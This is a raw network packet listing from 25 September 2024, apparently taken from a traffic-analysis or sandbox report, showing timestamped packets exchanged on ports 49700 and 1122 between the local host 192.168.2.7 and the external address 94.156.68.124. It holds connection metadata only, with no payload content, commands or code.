                                  Sep 25, 2024 01:11:13.122998953 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.123023033 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.123047113 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.123061895 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.123079062 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.123104095 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.123200893 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.123275042 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.123290062 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.123320103 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.123373032 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.124361992 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.124387980 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.124403000 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.124434948 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.124512911 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.124527931 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.124547005 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.124556065 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.124592066 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.124646902 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.124663115 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.124742985 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.124787092 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.124804974 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.124820948 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.124835968 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.124850988 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.124861956 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.124890089 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.125088930 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.125103951 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.125118017 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.125132084 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.125147104 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.125149012 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.125158072 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.125189066 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.125364065 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.125380039 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.125427961 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.125525951 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.125540018 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.125555038 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.125569105 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.125583887 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.125602961 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.125608921 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.125622034 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.125626087 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.125641108 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.125648975 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.125659943 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.125674963 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.126060963 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.126075983 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.126091003 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.126104116 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.126105070 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.126121998 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.126130104 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.126138926 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.126154900 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.126176119 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.126214981 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.129834890 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.129873991 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.129889011 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.129929066 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.129981041 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.129996061 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130009890 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130019903 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.130024910 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130120993 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130136967 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130151033 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.130192041 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.130223036 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130239010 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130281925 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.130320072 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130335093 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130367994 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.130419970 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130434990 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130449057 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130464077 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130485058 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.130486965 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130523920 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.130523920 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.130574942 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130588055 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130631924 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.130676985 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130692959 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130706072 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130719900 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130745888 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.130772114 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.130868912 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130884886 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130899906 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130916119 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.130944014 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.130975008 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.131021023 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.131036043 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.131058931 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.131072044 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.131078959 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.131088018 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.131103039 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.131117105 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.131131887 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.131140947 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.131140947 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.131146908 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.131167889 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.131172895 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.131205082 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.131402969 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.131417990 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.131551027 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.131572962 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.131587029 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.131596088 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.131603003 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.131618977 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.131628990 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.131639004 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.131644964 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.131655931 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.131695986 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.180644035 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.180680037 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.180694103 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.180718899 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.180735111 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.180748940 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.180798054 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.180850983 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.180866957 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.180881023 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.180911064 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.181003094 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.181016922 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.181031942 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.181037903 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.181046963 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.181060076 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.181081057 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.181102991 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.181175947 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.181191921 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.181235075 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.181294918 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.181310892 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.181438923 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.181453943 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.181469917 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.181480885 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.181487083 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.181503057 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.181512117 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.181524992 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.181719065 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.181736946 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.181751013 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.181771994 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.181796074 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.209455013 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.209515095 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.209530115 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.209580898 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.209595919 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.209610939 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.209626913 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.209660053 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.209660053 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.209660053 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.209763050 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.209800959 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.209815979 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.209898949 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.209912062 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.209925890 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.209943056 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.209956884 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.209990025 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.210009098 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.210047960 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.210124016 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.210148096 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.210164070 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.210191011 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.211163044 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.211194038 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.211209059 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.211235046 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.211257935 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.211333990 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.211350918 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.211365938 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.211400032 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.211420059 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.211607933 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.211623907 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.211638927 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.211651087 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.211654902 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.211673021 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.211680889 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.211697102 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.211774111 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.211867094 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.211880922 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.211903095 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.211910009 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.211926937 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.211937904 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.211941957 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.211957932 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.211967945 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.211972952 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.212001085 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.212285995 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.212301970 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.212342978 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.212449074 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.212470055 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.212492943 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.212507963 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.212508917 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.212523937 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.212536097 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.212538958 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.212554932 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.212565899 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.212569952 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.212585926 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.212601900 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.212614059 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.212629080 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.212663889 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.212681055 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.212708950 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.213077068 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.213095903 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.213136911 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.216784954 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.216810942 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.216825962 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.216881037 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.216912985 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.216983080 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.216998100 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217014074 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217029095 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217040062 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.217045069 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217071056 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.217135906 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217150927 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217175007 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217190027 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217190981 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.217206955 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217215061 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.217247963 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.217427015 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217442036 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217458010 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217473984 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217484951 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.217489004 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217524052 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.217576981 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217592001 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217611074 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217617035 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.217623949 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217648029 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.217725992 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217741966 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217765093 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217780113 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.217781067 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217808962 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.217947006 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217962980 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217977047 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.217989922 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.218003988 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.218020916 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.218106031 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.218122005 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.218137026 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.218153000 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.218163013 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.218178988 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.218255043 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.218270063 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.218285084 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.218298912 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.218311071 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.218338966 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.218352079 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.218369007 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.218381882 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.218391895 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.218398094 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.218411922 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.218420982 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.218427896 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.218442917 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.218455076 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.218482018 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.218661070 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.259021997 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.267546892 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.267580032 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.267594099 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.267642975 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.267658949 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.267673016 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.267740965 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.267740965 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.267787933 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.267916918 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.267931938 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.267946959 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.267959118 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.267976999 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.267993927 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.268019915 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.268035889 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.268050909 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.268081903 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.268260002 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.268276930 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.268292904 CEST11224970094.156.68.124192.168.2.7
